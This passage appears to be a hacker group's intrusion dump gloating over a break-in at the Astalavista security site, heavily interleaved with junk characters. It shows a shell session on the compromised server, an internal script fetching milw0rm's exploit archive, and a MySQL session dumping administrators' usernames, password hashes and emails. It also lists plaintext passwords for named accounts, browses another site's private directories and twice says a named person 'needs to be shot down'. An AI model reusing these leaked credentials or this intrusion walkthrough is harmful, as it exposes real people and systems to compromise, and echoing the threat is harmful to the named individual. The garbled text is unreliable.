/ U# G2 X" C. ]) N" t; _8 B <language>en-us</language>7 d& p4 o$ V V+ ~/ [$ R
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
# m7 i8 ^# ~- f <docs>http://blogs.law.harvard.edu/tech/rss</docs>0 c: o; U3 q8 ]" ?
<generator>Astalavista.com</generator>. r% s4 L% x( J% U" O& c
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘* C: h' g9 K" H
</channel>
5 Q9 x" `; d+ U( i% I& h</rss>’;
8 f7 P% f% C2 @" f7 G) n" y, h }; |
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {/ b+ I2 W: F j/ b. C! A
unlink (FULLPATH . ‘/feed/exploits.xml’);' x+ z% p( ?% ~& S, F- ?: S
}
7 Z3 O3 B* I( \( }, c! A# b9 z% A5 G7 U1 y0 ~+ s3 p7 ~- _# i, d
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
# C) L+ ], D: `3 B8 u& L[snip]
# M: V) ]4 }( H% D) Z4 Y: f7 t0 D
5 q1 Z H3 [: i5 B6 Bsh-3.2$ cat exploits.sh1 K4 f# I5 Y2 [7 A% z% m
#!/bin/sh& n/ I9 l* {: r
3 N7 l+ d" F: \###########################################################9 K& d2 N% y" C N
# #. P2 y/ V; y# V. j6 t3 f9 _6 j- P
# Title: milw0rm exploits adder #
6 M, O/ e" _1 h# Description: Add all milw0rm exploits to the #
5 x) T1 o* w& a$ U) V# Astalavista.com database #
% W$ s# [8 N: u* O" p, ]# #1 Y& r1 K4 r0 ~$ l9 w5 T
# Company: Astalavista Group #
: [: A W2 Y3 n# Author: Paulo M. Santos #& [3 S2 ?5 G- g, k) x1 _; k {
# E-Mail: 链接标记paulo.santos@astalavista.ch #
% @ e0 J/ i# W2 A6 V; I# #
h( b3 A! C5 T$ H5 C$ H8 F###########################################################
+ Z% K$ r1 k, m- r
' p" q) i7 Z; y7 z$ c6 x# path
# U2 D6 z/ o5 j4 w4 \2 m* jthis_path=/home/com/public_html/modifications/cronjobs& z9 T/ w, C4 p$ S2 F
u* y5 K3 L3 G5 O0 O, f* p6 T
# change directory$ T" t' E9 V e p3 V$ v) S
cd $this_path
f' `& Z8 R( ?9 ]: M2 [& ]$ Ycd tmp/
( n6 o8 j% `9 O9 y9 a% H7 P) K% V) q% n- ^" ?7 B. S; x4 c
# delete files1 c5 G" K, n- O
rm -rf milw0rm.tar.* &% {5 A2 w" m: P& b$ ? c6 I
rm -rf milw0rm/ &
2 {9 t. U5 C y6 L' B
. J" C/ u* {* x- S. b, r* S# wget milw0rm paket
, Y% S0 ]8 _) G. [wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]* B0 r9 H( w4 G) K0 W; K7 f
9 }1 O, t) M- ]* c/ k) J4 R0 N# extract milw0rm paket
$ U* D5 F1 S0 M5 ]5 Jtar -xvf milw0rm.tar.bz2
! \6 H7 h6 q/ v8 c; a( y/ U8 T/ |/ Q
# change owner+ X- K& R5 @8 Z6 i0 J' |+ E
chown -R com .
* L6 o* w' e, F& q/ `7 W9 kchgrp -R com .4 {# @6 o' G6 M+ {& i6 S
# M; H. A; D }+ d+ n& |5 ?# execute php script
& C% j% L( X8 V6 G1 f. kcd $this_path# u2 o, F) }3 y
php -q exploits.php
1 t. I4 n* v1 q6 |) ]$ B6 v# W% h" p9 t" w
# delete files
: `' U4 `8 G1 v% r; t& Yrm -rf tmp/milw0rm.tar.*+ Z' Y7 S {6 ` ?8 W5 g* \3 X
rm -rf tmp/milw0rm/0 S( ?' G% {4 \1 s0 U$ t
3 X0 G+ Q" u8 b: T ]7 J
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”" p8 C2 S3 v* y( E- k
Paulo M. Santos needs to be shot down./ \4 U9 ]: v) u& N2 A! F# Z
9 h0 S2 A( \* e/ H. ?* Cmysql -u contrexxuser2 -p2 S( _, g6 z( W u
Enter password:# ]2 h7 m$ L+ e& D0 q
Welcome to the MySQL monitor. Commands end with ; or \g.: P5 n8 k" {$ O
Your MySQL connection id is 261694
4 z9 Q: [' j; P" t+ PServer version: 5.0.45-community-log MySQL Community Edition (GPL)
- ~ u/ h+ U0 ~* K; D/ [0 x
2 A) l: t+ W- {5 @% mType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.9 [3 ?0 Z, g0 b' X8 t
2 a" q1 D h* q' _mysql> show databases;
6 p" Q" @& ]* j* K! f* Q# k* p/ X% P+——————–+& n: K- Y# `& }. L. h
| Database |3 ^( n$ P8 b; ~8 F# Y
+——————–+; e. h u% p7 y; w$ @, X- `$ j
| information_schema |
# q8 j5 x/ |; @ j8 q+ `| com_contrexx2 |
7 @4 M; }6 ]: W. l+ B y% A| com_contrexx2_live |
$ `- ?1 Y8 e, n% i2 u% Y| test |
H8 ?6 n4 {/ Z: W2 c+——————–+: ]: y( F K( q
4 rows in set (0.00 sec)
$ [% ` b( J9 Z! W
' @- l$ y: S7 [: m4 w" r4 wmysql> use com_contrexx2_live7 i9 \. t# a# T. j
Database changed! q( V8 E" X( m) {
mysql> show tables;
$ ~. m7 e7 _* P+————————————————–+
N! A, j* l6 y" y| Tables_in_com_contrexx2_live |
$ r/ @" L* y# K; p8 f& E1 j+————————————————–+
' t* j: ^3 p- g2 `| cc_banner_counter |
8 w/ a+ n6 m* ^) [ U| cc_search_counter |1 p) [3 i U, I& P% z1 o9 i' w
| contrexx_access_group_dynamic_ids |+ I8 c4 Q' j% `, F' z2 [) Z
| contrexx_access_group_static_ids |
1 Z" X: I4 Y8 o3 N a! X" W( }, w) G| contrexx_access_rel_user_group |
# p: e' @ F$ I| contrexx_access_settings |4 K0 e' L3 Z2 r
| contrexx_access_user_attribute |
# m( Z( ~2 L6 y, r! C6 E| contrexx_access_user_attribute_name |
5 s9 e q K h+ B| contrexx_access_user_attribute_value |6 E! @" v( z9 V6 a9 }- j1 ~
| contrexx_access_user_core_attribute |& I* ^; F, P( `+ r/ x* r3 i
| contrexx_access_user_groups |3 [' c2 E- D- i% Y( d
| contrexx_access_user_mail |7 V2 Q" h, D9 O% B, {' ^% p0 l
| contrexx_access_user_profile |' o0 G3 h9 [" o$ F, ]' G
| contrexx_access_user_title |
! G# \9 O" _4 ~ [' n ?+ `) z6 g| contrexx_access_user_validity |
. j) E3 c5 y4 x! ]| contrexx_access_users |: C' | Z5 p( s! L4 W$ n: W' S, R
| contrexx_backend_areas |
- |+ s" f0 ~1 ^2 H| contrexx_backups |
R- E! O) Y/ x( F% R# H| contrexx_content |' s* }! }& |5 X
| contrexx_content_history |
# ^* L( B" j( i6 w8 {6 E5 D| contrexx_content_logfile |
- v) q7 Y t+ W$ Q( ]& E2 k| contrexx_content_navigation |8 }5 L- b4 ?3 p% _' h- g% d
| contrexx_content_navigation_history |; q1 R' B) s" m: b9 k
| contrexx_ids |
! z: Q9 Q- t/ d8 h# U+ U* A| contrexx_languages |& e# G% J' s! ^1 S
| contrexx_lib_country |
# G/ I5 q5 G) O1 \4 B8 \| contrexx_log |) d, Y {5 E8 |
| contrexx_module_alias_source |
, o3 W2 g7 w: r7 E( x2 i| contrexx_module_alias_target |
& V* t- s. Q4 r| contrexx_module_block_blocks |' z9 k3 s5 g2 Q n
| contrexx_module_block_rel_lang |
. B" u! B5 m0 d8 y- Y| contrexx_module_block_rel_pages |7 P6 |% T; N6 G/ i6 u9 q1 v
| contrexx_module_block_settings |
$ U5 A. k( M# s| contrexx_module_blog_categories |# V, a3 B+ ]. _+ o% {0 ]
| contrexx_module_blog_comments |
* ]: J# I# e$ }0 ?" `* l| contrexx_module_blog_message_to_category |
/ d2 E* D* v/ x- V- l w| contrexx_module_blog_messages |1 ?" S, l8 W( R* E
| contrexx_module_blog_messages_lang |
$ H# A1 P# E6 I# x* U" c| contrexx_module_blog_networks |
1 C% j% b2 t( n' B& p, a| contrexx_module_blog_networks_lang |
# n0 E" i% Q2 R" S3 O1 P| contrexx_module_blog_settings |& e' b- C0 ?4 a
| contrexx_module_blog_votes |0 q' j6 f+ x& m: [6 ^+ T
| contrexx_module_calendar |
% [9 G2 x, T" h; S| contrexx_module_calendar_access |
0 w; [) o6 k* H5 e4 q$ c' [4 H| contrexx_module_calendar_categories |6 Y' N: {8 `0 D7 d
| contrexx_module_calendar_form_data |8 i0 A, {" m6 G. e! n# T% b4 I+ h
| contrexx_module_calendar_form_fields |$ @1 m$ q; h$ D# w9 W
| contrexx_module_calendar_registrations |/ o2 Z* V0 z5 d* T+ [! R
| contrexx_module_calendar_settings |
g9 Q" C @1 U9 o| contrexx_module_calendar_style |
+ U5 ~9 k( |; r6 J3 X| contrexx_module_contact_form |
- q# v3 S D$ W) d9 K2 j| contrexx_module_contact_form_data |* U5 U# d1 E4 G m$ v8 T
| contrexx_module_contact_form_field |+ Z4 w8 g6 d8 q* a: i$ Z0 b
| contrexx_module_contact_settings |2 B$ v9 ~' B7 |
| contrexx_module_data_categories |
2 e- V6 W- ?' U| contrexx_module_data_message_to_category | f, P5 E& P6 T
| contrexx_module_data_messages |
* N; B' ?& V8 D5 u% j7 Y| contrexx_module_data_messages_lang |/ A9 w, b: i3 {; x4 D$ x
| contrexx_module_data_placeholders |' _4 U' r1 k6 Q, r* X
| contrexx_module_data_settings |
+ f5 o$ s2 R7 N6 p; \: C| contrexx_module_directory_access |
) ]0 V7 B2 w$ Z- x| contrexx_module_directory_categories |+ d3 K3 G( C& L! J
| contrexx_module_directory_dir |
8 ]5 D7 x! n7 _| contrexx_module_directory_inputfields |
2 @# R7 H$ g+ w' k, _% d| contrexx_module_directory_levels |
7 M2 _1 H# }: Z2 U" Y' N8 s$ P| contrexx_module_directory_mail |
i' P) w) ]: M; G0 S| contrexx_module_directory_rel_dir_cat |
- c2 l M4 s# T" P7 f| contrexx_module_directory_rel_dir_level |
6 O# {/ H7 Q1 J3 n* s| contrexx_module_directory_settings |
p5 `1 W1 \& d: [8 ~- [) D6 ]6 O| contrexx_module_directory_settings_google |
B2 m D( ]4 P4 I3 K) c. K0 f+ P- Z| contrexx_module_directory_vote |
0 v. X. q# ]$ k$ Z' _) R$ K) R4 Q1 Y| contrexx_module_docsys |! ^2 Q% F0 B6 [$ a5 h8 i
| contrexx_module_docsys_categories |
& q; g$ E% k' y3 G" f- c| contrexx_module_egov_configuration |: t; v) ^! g" w9 n( F
| contrexx_module_egov_orders |
1 Y9 X- P; H2 n% L| contrexx_module_egov_product_calendar |* q6 o* `/ u+ p- j
| contrexx_module_egov_product_fields |$ j0 y4 F9 {. U: w. }: e
| contrexx_module_egov_products |
( r6 z4 b7 q1 i4 H| contrexx_module_egov_settings |6 E' z# B3 @7 T. R0 a8 K4 ~5 N
| contrexx_module_exploits |
' g+ w2 n8 t3 j9 C7 h| contrexx_module_exploits_categories |
9 o4 w" p) Q+ t; l. d u$ y| contrexx_module_feed_category |
# M4 ~, d( @3 `! E| contrexx_module_feed_news |8 {6 d2 j' q$ \8 h, k
| contrexx_module_feed_newsml_association |
1 Q: E3 ~8 Q$ x d| contrexx_module_feed_newsml_categories |/ i! Y3 r/ x# ]$ y& m
| contrexx_module_feed_newsml_documents |- I4 I1 q# u* H/ u! _: a
| contrexx_module_feed_newsml_providers |
8 c% Q2 a% a" g* s| contrexx_module_forum_access |' E b6 i1 u) M1 {6 x! z' a( I
| contrexx_module_forum_categories |
3 D" e. m2 ` ^" {# m; L i| contrexx_module_forum_categories_lang |! Z0 G- l& I/ j: v0 E# D; s; @ g! }
| contrexx_module_forum_notification |
7 `/ p/ `* }. X| contrexx_module_forum_postings |
, f1 S" _4 C: o| contrexx_module_forum_rating |+ s: g8 W3 t$ V
| contrexx_module_forum_settings |
: }" K: M1 r ?; z| contrexx_module_forum_statistics |! d9 H" N3 |, M) T5 s1 Z- o
| contrexx_module_gallery_categories |
" d# J+ w/ [( Q3 C% \, ~| contrexx_module_gallery_comments |
: d- g! q5 `- v+ p8 t| contrexx_module_gallery_language |) y: A; }+ v/ W1 h
| contrexx_module_gallery_language_pics |
0 e: }$ C/ R: ~8 O| contrexx_module_gallery_pictures |
- a0 c3 k) l- S) X| contrexx_module_gallery_settings |
* V( F1 N* i: Z0 b, U) [( E8 ^| contrexx_module_gallery_votes |" u, I4 o2 ^: t- `
| contrexx_module_guestbook |
5 _ e! C; T2 a: r| contrexx_module_guestbook_settings |
/ Q+ b$ r' b3 C% C| contrexx_module_livecam |
4 @$ z* T! D' J& D3 G| contrexx_module_livecam_settings |* @$ q, y. U, r# i$ N
| contrexx_module_market | U2 i ]2 |) S. A; L! E
| contrexx_module_market_access |- f- \$ |% m/ o3 J* z; h! {
| contrexx_module_market_categories |
, f! M6 n; _4 u$ x0 L8 ` G| contrexx_module_market_mail |
/ [+ @ g& S& d" l# V% H| contrexx_module_market_paypal |5 u: l6 u- G1 P
| contrexx_module_market_settings |/ ?. `) K: g( C! m6 f& o& F
| contrexx_module_market_spez_fields |
* f; s# |. L5 n$ h4 ?| contrexx_module_mediadir_access |
, P9 C8 \- h( o7 }& N9 H$ q| contrexx_module_mediadir_categories |) @ C6 `1 `& y' i8 p3 M+ w$ S
| contrexx_module_mediadir_comments |
' Z w5 u+ P# f9 f6 b| contrexx_module_mediadir_dir |9 p' }) w7 F% Y6 l
| contrexx_module_mediadir_inputfields |
: b, F3 C( A7 D7 [1 w| contrexx_module_mediadir_levels | L0 b# m, B5 U6 B
| contrexx_module_mediadir_mail |
3 w( @+ H3 Q- v0 M8 {! w| contrexx_module_mediadir_rel_dir_cat |3 ]6 q* Q; o' {, i4 `
| contrexx_module_mediadir_rel_dir_level |
6 ]; b* B4 |: `+ b| contrexx_module_mediadir_reports |
( J' |% Y4 x! || contrexx_module_mediadir_settings |/ X" Y" {! |) c' C- j0 r, x
| contrexx_module_mediadir_settings_google |
5 A( _ s" Z( n. h9 c| contrexx_module_mediadir_vote |0 ~( `; N3 b0 S% l
| contrexx_module_memberdir_directories |
) {; I/ M! A! x6 k g| contrexx_module_memberdir_name |! z) _4 s/ j. U4 r5 ^9 N+ z0 A
| contrexx_module_memberdir_settings |
. n5 d/ b6 y) D9 d| contrexx_module_memberdir_values |/ x& |. a1 @6 [/ d9 a) Y5 m; [9 n& k6 ]
| contrexx_module_nettools_allowed_groups |
5 s3 q) D' Y2 L; R' V| contrexx_module_nettools_settings |& Q Y& J9 G, j# |) I5 K& X
| contrexx_module_news |
) ?$ c0 j' U# h1 I v| contrexx_module_news_access |
4 ^2 P1 f) p/ I- ~" q| contrexx_module_news_categories |
4 l" o1 [+ l, p| contrexx_module_news_settings |
9 W2 P" S" K0 Q3 I- r| contrexx_module_news_teaser_frame |
z$ M4 h1 K& |5 u! G! e& T% F8 [| contrexx_module_news_teaser_frame_templates |! b4 f/ q% f* e. q
| contrexx_module_news_ticker |' [2 X/ N0 ^0 [; Q! V; D
| contrexx_module_newsletter |3 `& K, g# `0 ]# q; v" M& r
| contrexx_module_newsletter_attachment |0 o) d+ |/ X# c6 a0 F) s3 T5 B
| contrexx_module_newsletter_category |
/ h \: A' e/ @* L- I+ a8 r| contrexx_module_newsletter_confirm_mail | L. {* S0 N$ n1 V& ^8 e
| contrexx_module_newsletter_rel_cat_news |8 N# ~1 ]" M4 W$ [$ U
| contrexx_module_newsletter_rel_user_cat |* T" d: {0 n- p$ b3 x b6 m
| contrexx_module_newsletter_settings |* Q% I5 j. R7 r" M& g, v# m
| contrexx_module_newsletter_template |0 {% V6 a! I9 T8 Q o x
| contrexx_module_newsletter_tmp_sending |9 r2 L8 n+ n: Y
| contrexx_module_newsletter_user |
, U( m) d# S1 l: ?! z| contrexx_module_newsletter_user_title |
6 N7 \- P# N; C/ K ~# i| contrexx_module_onlinetools_defaultports |
' m7 a6 W3 t4 m j' d0 Q5 e| contrexx_module_onlinetools_defaultports_back |
- {& Q( g) v, y8 || contrexx_module_onlinetools_geolitecity_blocks |" \1 b3 ?/ F. U7 P
| contrexx_module_onlinetools_geolitecity_country |$ M2 M) O: a+ V( \# {# \0 L, y
| contrexx_module_onlinetools_geolitecity_location |( T0 M+ A6 x6 Q* X
| contrexx_module_podcast_category |
$ E O2 p. n5 J4 N| contrexx_module_podcast_medium |+ g+ r( x* p/ |2 O5 p# {, R
| contrexx_module_podcast_rel_category_lang |; p& ]+ f+ }& M7 I
| contrexx_module_podcast_rel_medium_category |
0 r) E; q* J$ A| contrexx_module_podcast_settings |+ r7 s5 }! [3 I3 s( S/ z0 ?: _
| contrexx_module_podcast_template |& h- r" T) V v. @
| contrexx_module_proxydb |2 L; f, L5 h: {1 S1 G: e, Q$ e
| contrexx_module_recommend |2 i# r2 t' f _$ C' U2 D
| contrexx_module_repository |% C( k1 V0 m$ g) W# B% i
| contrexx_module_securitynews_cats |
+ ^7 g5 @2 N7 U| contrexx_module_securitynews_feeds |
. q+ F! l# d- r* R p& {5 F| contrexx_module_securitynews_news |
m- `! l/ k# h; O1 D5 M8 @/ M+ R' U| contrexx_module_shop_categories |$ e2 q" s6 a) m( m
| contrexx_module_shop_config |7 D$ B* Y% P0 a. _
| contrexx_module_shop_countries |+ Q( y, i& p; _
| contrexx_module_shop_currencies |4 ]7 e" G" h& d
| contrexx_module_shop_customers |9 G; Q$ |& e; S4 |( l, u) n2 ?
| contrexx_module_shop_importimg |; X: h% H# \" d" z
| contrexx_module_shop_lsv |
. N% g+ v. u( {) r7 _1 t- [| contrexx_module_shop_mail |* K1 s6 K! r) V+ n" c
| contrexx_module_shop_mail_content |1 j$ d$ }& l9 P0 L
| contrexx_module_shop_manufacturer |! F% N' I9 e0 C+ n. ^5 U8 X5 X
| contrexx_module_shop_order_items |, R. M& H/ k' q: N' `/ c
| contrexx_module_shop_order_items_attributes |
0 P% n: C; ]6 _& E- h| contrexx_module_shop_orders |
8 C* C& u2 k0 N6 r; p| contrexx_module_shop_payment |
0 e! z! J( z( ]* u- L( g: e1 {" L" N| contrexx_module_shop_payment_processors |" w- L: @/ d2 N$ s+ p. o' R& Y
| contrexx_module_shop_pricelists |
& w) C" P6 R+ i| contrexx_module_shop_products |
: `" b7 w4 b D8 V- r: }# v3 k| contrexx_module_shop_products_attributes |
- ]7 h6 `' D; P& T/ o* v| contrexx_module_shop_products_attributes_name |
, O, c& _+ |4 U, N8 {| contrexx_module_shop_products_attributes_value |
; B6 ^/ x* L( X3 T3 `& _. C| contrexx_module_shop_products_downloads |
' H) ^4 ?; y" N/ N6 i2 p! r| contrexx_module_shop_rel_countries |( j* w# b) q5 s2 G$ U
| contrexx_module_shop_rel_payment |$ `+ _2 M, ]$ x t
| contrexx_module_shop_rel_shipment |6 V# G+ l: _$ C
| contrexx_module_shop_shipment_cost |
4 i! j& n' l+ ?| contrexx_module_shop_shipper |
4 [9 @9 M4 m6 ? u2 m9 U| contrexx_module_shop_vat |, w8 @" E# k4 g& J" O8 F
| contrexx_module_shop_zones |
1 T7 \# A& W6 F5 u6 i2 P% Y| contrexx_module_u2u_address_list |1 O: x5 C' v O( |0 t0 m
| contrexx_module_u2u_message_log |4 F3 P5 i$ J0 F2 Y) Q
| contrexx_module_u2u_sent_messages |
: w+ @) @- i. D$ E7 m$ N" n6 |5 T| contrexx_module_u2u_settings |
0 t" U8 ~# i1 x| contrexx_module_u2u_user_log |6 B4 t8 ?) _4 p9 b
| contrexx_modules |
+ |) l9 h6 H" k: f& _4 h9 L| contrexx_sessions |7 @# ]* N, |% {; l& p# ^
| contrexx_settings |: f) ~2 U( Z7 h6 L2 `
| contrexx_settings_smtp |
" [% G7 d2 n4 A3 N2 x7 e) {| contrexx_skins |
! o0 g+ E1 ^/ i+ Y| contrexx_stats_browser |: m( B1 j+ D# V+ a7 Z* `
| contrexx_stats_colourdepth | O! ~; [: m' Z# d( m) {
| contrexx_stats_config |$ ? d' {* Y9 p
| contrexx_stats_country |
; Q# L7 `+ o' L$ M1 J| contrexx_stats_hostname |
; o2 n& [8 K) w# u4 ~+ u| contrexx_stats_javascript |# z+ J0 ?! D- s5 B
| contrexx_stats_operatingsystem |
3 r6 D9 Y8 D: p3 }| contrexx_stats_referer |3 t2 [$ A, f; w/ k
| contrexx_stats_requests |
& u* d; w/ Q: S2 u3 {| contrexx_stats_requests_summary |
! I% Y; n/ [$ f! o" C| contrexx_stats_screenresolution |0 X: y5 v$ Z# d* C! Z
| contrexx_stats_search |; l$ O- `6 Q0 h7 B5 P
| contrexx_stats_spiders |# F3 N9 _4 \' F5 n
| contrexx_stats_spiders_summary |/ W5 S" a) f! F, `1 \
| contrexx_stats_visitors |
7 K* t7 J/ m: ]# s, k! o| contrexx_stats_visitors_summary |! Z0 w; l J: q
| contrexx_voting_additionaldata |
* {) M* w: D: F* I| contrexx_voting_email |
8 X$ U6 C" P9 F) m4 N5 A. g| contrexx_voting_rel_email_system | l) _* b; n. t. M/ k/ {
| contrexx_voting_results |
. T1 T7 E2 H" ^# j% N| contrexx_voting_system |
% P5 x& T# c/ a9 h1 Z0 [5 O| foo |5 G' t$ ]; v# J
+————————————————–+- A* z* Z5 d1 D2 p$ G3 h
227 rows in set (0.01 sec)$ a$ S* W e8 `9 h% E* ?8 x1 D7 @
3 r z! c* e& }* y6 c) E
mysql> select count(*) as skids from contrexx_access_users;+ R" S2 u+ G# o3 ?
+——-+6 H6 m5 r' e& P/ N+ W7 F
| skids |
: o `$ e6 I4 M2 ?+ O, N* C+——-+) k" j* {& }5 S' s3 u
| 53699 |; o8 H5 p. _: U. N: F
+——-+
m9 ~7 x6 L. p# y1 row in set (0.00 sec)+ G! B! {, {5 \2 D: [1 U
7 e; @1 U. f# }: D0 C4 Imysql> describe contrexx_access_users;7 ?) ?& w! F- a( |, F
+——————+——————————————+——+—–+————–+—————-+
" J% p/ c3 d f) H$ N! b| Field | Type | Null | Key | Default | Extra |
6 C' T8 V0 j; a5 e w+——————+——————————————+——+—–+————–+—————-+, K0 l1 L$ v- ?- Z; T
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
% r4 J4 w4 R9 G$ ?& G3 }; j+ a$ B| is_admin | tinyint(1) unsigned | NO | | 0 | |
" a2 [2 C7 A) }+ }| username | varchar(40) | YES | MUL | NULL | |
! |; w! @" U3 U" h& G. y0 e| password | varchar(32) | YES | | NULL | |
. A( w7 g0 [3 h) I. Y: k| regdate | int(14) unsigned | NO | | 0 | |
" G/ N% ?/ Q z; {5 M* v7 ~5 r# C| expiration | int(14) unsigned | NO | | 0 | |
+ _& {1 m& y/ h& d$ ?6 G, W P, U| validity | int(10) unsigned | NO | | 0 | |0 a( C- }1 D" h. l
| last_auth | int(14) unsigned | NO | | 0 | |! j8 Y8 {$ j$ J. C9 M; P
| last_activity | int(14) unsigned | NO | | 0 | |3 \9 L( J& }9 v/ P6 r6 @/ X
| email | varchar(255) | YES | | NULL | |$ Z! `: V5 K# U- l
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |0 P( n0 V9 t Z, j5 E5 j
| frontend_lang_id | int(2) unsigned | NO | | 0 | |# H' W# i, k( j- |& v
| backend_lang_id | int(2) unsigned | NO | | 0 | |4 v* w& r+ P; ~6 ?
| active | tinyint(1) | NO | | 0 | |( ~& H$ R% V. P% o
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
' K4 b/ n% z4 A& v| restore_key | varchar(32) | NO | | | |( w; B; J. }% f( q$ O
| restore_key_time | int(14) unsigned | NO | | 0 | |
& b8 R. G5 N" W" x0 v5 `| u2u_active | enum(’0′,’1′) | NO | | 1 | |
# G8 \& \2 j) n, j+——————+——————————————+——+—–+————–+—————-+
5 D& H/ U9 V/ z; L" E18 rows in set (0.00 sec)7 C; o# N/ T" [8 M4 x P) |. R
: S. p/ Z) Q( X) H9 q9 }mysql> select username,password,email from contrexx_access_users where is_admin = 1;
" s' r6 U6 P+ u' U, ?$ i+————+———————————-+—————————–+: v& I/ b4 A* u; Y5 l" u
| username | password | email |' Z' b# u7 D$ O' \, R- q# G
+————+———————————-+—————————–+9 S) Q- H4 j% x7 Y
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
; G, r& g- i' B x- o2 [5 X| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |6 G3 z9 _, R% V& m# d
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
( O# V) Z+ h- O" |9 G| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |% E9 b% Z) Z5 l
+————+———————————-+—————————–+6 t) b% L5 ^8 _: d) D2 D+ z
4 rows in set (0.04 sec)$ L- _; _# f( ^. A( a8 {
& N* @: f7 r, Gmysql> exit;
7 T' k+ l q+ N2 n; d5 f4 Q* sBye
; C- U% R5 T& H" z+ p4 `8 q, u2 L' V1 U9 k
[~] There you go, your “team of security and IT professionals” is a joke.& L, s" D s6 P4 [4 X2 a# l
" P8 ~4 Y' X% h+——————————+
7 a( W% A5 S" |; c1 f" Jsystem:f82BN3+_*) z: O# n- ?7 e2 W5 J* O
Be1er0ph0r:belerophor4astacom
2 d/ L. l6 y, w6 l! y3 U# zprozac:asta4cms!" B5 u4 h% d0 X3 U$ x) [0 g
commander:mpbdaagf6m0 U8 I+ E1 `; C
sykadul:ak29eral+ L& z; H3 ~- P2 Z# p
+——————————+
5 J5 l8 V* | L8 ?6 o1 J' W* m3 P# E5 h: o5 V3 K' k
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
) ]6 ~# Y5 l9 J- c…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
9 k* w6 o: A3 @9 d
' b. P5 N; z3 n[~] Lets move to astalavista.net now,/ S6 p5 Y; N" i2 T9 X% v0 P
2 z S; B5 F K7 W% x" Z# ]
From <链接标记[url]https://www.astalavista.net/[/url]>:
* {" b* T9 }. w, c' `>> Everyone knows that the best defense is a good offense.- c% }, T6 L1 G6 l
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
/ }1 c4 L3 P; w6 i- L! n>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
: ] S) u# a( v% l>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”+ _4 A$ \- y: e! J
9 N' H7 Y: u3 T+ S6 z. s* S0 ^1 g>> Go ahead, try and hack our server . in a completely legal way!$ h/ ~' ~3 @# D! W* b* I
>> Learn by doing: We offer our members tricky tasks and challenges on an
7 w" W% K6 a( x+ L: E* I>> ongoing basis so you can test your knowledge and abilities. You can also) g: {; g8 e8 N3 i/ {0 F1 W$ d
>> demonstrate what you.ve mastered by taking part in regular hacker contests; a8 b6 P a. H5 Y; W' f8 l* \
>> and war games: i. R. F1 H' c; s. M% [+ G
0 T* y+ }: c7 B1 K[~] Lets take a look there, after all… they are hack-proof, aren’t they?!8 }; K; G- m# H
) g- t5 f: y9 H
[-] Tricky task: Find home dir of astalavista.net
! K0 |( z: z# x8 m1 ~* W0 X/ [" s2 ]) Z. o7 D
sh-3.2$ ls -la ~astanet
9 ^6 m, ]/ q L# I" w4 Ztotal 481 e+ }. z( s# w) q" C
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
% I- f) s5 F4 ~- F/ Q% S8 V0 _drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
* N: k0 ~6 C) k+ [! H0 odrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth5 a6 U! ~% t5 r9 g; H, f/ A
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
. I; b, P7 F* V8 L) x3 j-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout) z% y! _0 E& k: v
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
, _+ D0 `+ b% q$ X# ~-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
0 @) W4 W! T2 {6 K& q5 T% N+ pdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains8 V& |" |2 q) c* k) K
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
8 Y P2 i- X% ~3 Q( m. D: A4 Mdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
* L) a0 E$ ?: l+ {4 ^lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html5 i& @1 u6 y4 a3 q
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
% E1 D1 I. G7 J+ R) U8 v I0 x" b" { y0 j# `' |+ J+ n4 k ^
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
7 K# I* G l, p: csh-3.2$ ls -la. q& r2 n% G% V2 R3 v7 Z
total 200
) W# Q4 b2 ?# X! Cdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .7 }- @6 e. Y1 \1 g
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..! X) D# |( G4 ^
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
/ W- P4 t5 z" y6 X% n0 Udrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql- `0 X l+ m; G9 `
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com& \: o* Y3 a- z3 m6 V0 a
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
2 |3 F, B) I4 I" Z$ T, odrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner- v, K; R+ v" r" g- \* H+ W) N
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg6 T g! b) a* I) `& O0 f! p9 s
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config4 k4 F# p1 V4 T: K
